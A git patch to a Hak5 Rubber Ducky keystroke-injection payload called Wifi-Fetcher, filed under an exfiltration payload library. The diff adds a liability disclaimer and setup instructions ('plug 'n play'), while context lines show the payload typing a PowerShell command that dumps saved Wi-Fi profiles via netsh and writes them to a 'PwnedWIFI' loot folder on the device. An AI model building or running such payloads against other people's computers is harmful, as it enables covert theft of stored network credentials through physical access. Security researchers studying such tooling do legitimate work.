From 59501f2e622971c5d32156ddfdf116def4da674c Mon Sep 17 00:00:00 2001 From: NightCoder-bit <125805141+NightCoder-bit@users.noreply.github.com> Date: Tue, 2 Jan 2024 23:02:27 +0100 Subject: [PATCH] Finished Wifi-Fetcher Added DISCLAIMER and INSTRUCTIONS --- payloads/library/exfiltration/Wifi-Fetcher | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/payloads/library/exfiltration/Wifi-Fetcher b/payloads/library/exfiltration/Wifi-Fetcher index a287e83..6b18db4 100644 --- a/payloads/library/exfiltration/Wifi-Fetcher +++ b/payloads/library/exfiltration/Wifi-Fetcher @@ -1,3 +1,9 @@ +REM DISCLAIMER: the end User of the Script IS the only Person Held responsible for the harm or leak of information caused by the payload, Neither the creator of the Script nor the Distribute(Hak5 LLC.) shall BE Held responsible for any damages caused. + + +REM INSTRUCTIONS: IF YOU DONT HAVE THE DIRECTORY D:\loot\PwnedWIFI\ On THE DUCKY, THIS SCRIPT WILL NOT WORK, EITHER CREATE THE DIRECTORY OR MODIFY THE PAYLOAD TO STORE THE OUTPUT FILE ELSEWHERE +REM After creating the directory and adjusting the delays, it IS basically plug 'n play + REM NAME: Wifi-Fetcher REM AUTHOR: nightcrafttrl1 REM DEVICE: RubberDucky @@ -20,4 +26,4 @@ STRING powershell -c "netsh wlan show profiles | Select-String 'All User Profile ENTER DELAY 3000 STRINGLN exit -ATTACKMODE OFF +ATTACKMODE OFF \ No newline at end of file